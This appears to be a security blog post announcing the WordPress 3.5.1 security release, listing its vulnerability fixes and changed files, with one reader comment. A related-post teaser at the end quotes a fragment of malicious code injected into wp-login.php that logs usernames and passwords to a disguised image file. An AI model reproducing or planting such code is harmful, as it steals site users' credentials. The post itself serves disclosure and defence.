WordPress 3.5.1 Released

The WordPress team just pushed out a new version of WordPress (3.5.1) that has some security bugs fixed. Straight from their release post, these are the security changes:

  1. A server-side request forgery vulnerability and remote port scanning using pingbacks. This vulnerability, which could potentially be used to expose information and compromise a site, affects all previous WordPress versions. This was fixed by the WordPress security team. We’d like to thank security researchers Gennady Kovshenin and Ryan Dewhurst for reviewing our work.
  2. Two instances of cross-site scripting via shortcodes and post content. These issues were discovered by Jon Cave of the WordPress security team.
  3. A cross-site scripting vulnerability in the external library Plupload. Thanks to the Moxiecode team for working with us on this, and for releasing Plupload 1.5.5 to address this issue.

There weren’t many changes in this release, but these are all the modified files:

Files wordpress-3.5/readme.html and wordpress-3.5.1/readme.html differ
Files wordpress-3.5/wp-admin/about.php and wordpress-3.5.1/wp-admin/about.php differ
Files wordpress-3.5/wp-admin/css/wp-admin.css and wordpress-3.5.1/wp-admin/css/wp-admin.css differ
Files wordpress-3.5/wp-admin/css/wp-admin.min.css and wordpress-3.5.1/wp-admin/css/wp-admin.min.css differ
Files wordpress-3.5/wp-admin/images/sort-2x.gif and wordpress-3.5.1/wp-admin/images/sort-2x.gif differ
Files wordpress-3.5/wp-admin/includes/image-edit.php and wordpress-3.5.1/wp-admin/includes/image-edit.php differ
Files wordpress-3.5/wp-admin/includes/media.php and wordpress-3.5.1/wp-admin/includes/media.php differ
Files wordpress-3.5/wp-admin/includes/update-core.php and wordpress-3.5.1/wp-admin/includes/update-core.php differ
Files wordpress-3.5/wp-admin/js/post.js and wordpress-3.5.1/wp-admin/js/post.js differ
Files wordpress-3.5/wp-admin/js/post.min.js and wordpress-3.5.1/wp-admin/js/post.min.js differ
Files wordpress-3.5/wp-admin/network.php and wordpress-3.5.1/wp-admin/network.php differ
Files wordpress-3.5/wp-content/plugins/akismet/admin.php and wordpress-3.5.1/wp-content/plugins/akismet/admin.php differ
Files wordpress-3.5/wp-content/plugins/akismet/akismet.js and wordpress-3.5.1/wp-content/plugins/akismet/akismet.js differ
Files wordpress-3.5/wp-content/plugins/akismet/akismet.php and wordpress-3.5.1/wp-content/plugins/akismet/akismet.php differ
Only in wordpress-3.5.1/wp-content/plugins/akismet: .htaccess
Files wordpress-3.5/wp-content/plugins/akismet/readme.txt and wordpress-3.5.1/wp-content/plugins/akismet/readme.txt differ
Files wordpress-3.5/wp-content/themes/twentyeleven/languages/twentyeleven.pot and wordpress-3.5.1/wp-content/themes/twentyeleven/languages/twentyeleven.pot differ
Files wordpress-3.5/wp-content/themes/twentytwelve/languages/twentytwelve.pot and wordpress-3.5.1/wp-content/themes/twentytwelve/languages/twentytwelve.pot differ
Files wordpress-3.5/wp-includes/class-http.php and wordpress-3.5.1/wp-includes/class-http.php differ
Files wordpress-3.5/wp-includes/class-wp-embed.php and wordpress-3.5.1/wp-includes/class-wp-embed.php differ
Files wordpress-3.5/wp-includes/class-wp.php and wordpress-3.5.1/wp-includes/class-wp.php differ
Files wordpress-3.5/wp-includes/class-wp-xmlrpc-server.php and wordpress-3.5.1/wp-includes/class-wp-xmlrpc-server.php differ
Files wordpress-3.5/wp-includes/comment.php and wordpress-3.5.1/wp-includes/comment.php differ
Files wordpress-3.5/wp-includes/css/editor.css and wordpress-3.5.1/wp-includes/css/editor.css differ
Files wordpress-3.5/wp-includes/css/editor.min.css and wordpress-3.5.1/wp-includes/css/editor.min.css differ
Files wordpress-3.5/wp-includes/default-filters.php and wordpress-3.5.1/wp-includes/default-filters.php differ
Files wordpress-3.5/wp-includes/functions.php and wordpress-3.5.1/wp-includes/functions.php differ
Files wordpress-3.5/wp-includes/js/media-editor.js and wordpress-3.5.1/wp-includes/js/media-editor.js differ
Files wordpress-3.5/wp-includes/js/media-editor.min.js and wordpress-3.5.1/wp-includes/js/media-editor.min.js differ
Files wordpress-3.5/wp-includes/js/media-views.js and wordpress-3.5.1/wp-includes/js/media-views.js differ
Files wordpress-3.5/wp-includes/js/media-views.min.js and wordpress-3.5.1/wp-includes/js/media-views.min.js differ
Files wordpress-3.5/wp-includes/js/plupload/changelog.txt and wordpress-3.5.1/wp-includes/js/plupload/changelog.txt differ
Files wordpress-3.5/wp-includes/js/plupload/plupload.flash.swf and wordpress-3.5.1/wp-includes/js/plupload/plupload.flash.swf differ
Files wordpress-3.5/wp-includes/js/plupload/plupload.html5.js and wordpress-3.5.1/wp-includes/js/plupload/plupload.html5.js differ
Files wordpress-3.5/wp-includes/js/plupload/plupload.js and wordpress-3.5.1/wp-includes/js/plupload/plupload.js differ
Files wordpress-3.5/wp-includes/js/plupload/plupload.silverlight.js and wordpress-3.5.1/wp-includes/js/plupload/plupload.silverlight.js differ
Files wordpress-3.5/wp-includes/js/plupload/plupload.silverlight.xap and wordpress-3.5.1/wp-includes/js/plupload/plupload.silverlight.xap differ
Files wordpress-3.5/wp-includes/js/tinymce/tiny_mce.js and wordpress-3.5.1/wp-includes/js/tinymce/tiny_mce.js differ
Files wordpress-3.5/wp-includes/js/tinymce/wp-tinymce.js.gz and wordpress-3.5.1/wp-includes/js/tinymce/wp-tinymce.js.gz differ
Files wordpress-3.5/wp-includes/js/tinymce/wp-tinymce-schema.js and wordpress-3.5.1/wp-includes/js/tinymce/wp-tinymce-schema.js differ
Files wordpress-3.5/wp-includes/media.php and wordpress-3.5.1/wp-includes/media.php differ
Files wordpress-3.5/wp-includes/media-template.php and wordpress-3.5.1/wp-includes/media-template.php differ
Files wordpress-3.5/wp-includes/post.php and wordpress-3.5.1/wp-includes/post.php differ
Files wordpress-3.5/wp-includes/script-loader.php and wordpress-3.5.1/wp-includes/script-loader.php differ
Files wordpress-3.5/wp-includes/template.php and wordpress-3.5.1/wp-includes/template.php differ
Files wordpress-3.5/wp-includes/user.php and wordpress-3.5.1/wp-includes/user.php differ
Files wordpress-3.5/wp-includes/version.php and wordpress-3.5.1/wp-includes/version.php differ
Files wordpress-3.5/wp-includes/wp-db.php and wordpress-3.5.1/wp-includes/wp-db.php differ

What is interesting is that they added an .htaccess to the akismet directory to prevent direct PHP execution in there. We actually recommend doing the same for your whole wp-content folder to prevent direct PHP execution on all the themes and plugins (our plugin does that as part of our hardening).

In any event, if you are using WordPress, update now!

3 comments
  1. Seems the whole Pingback machanism got broken by the fix. I just switched from wordpress.com to self hosted wordpress and I can do what I want, I cannot get my wordpress to send pingbacks. Receiving does work though.

Comments are closed.

You May Also Like

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post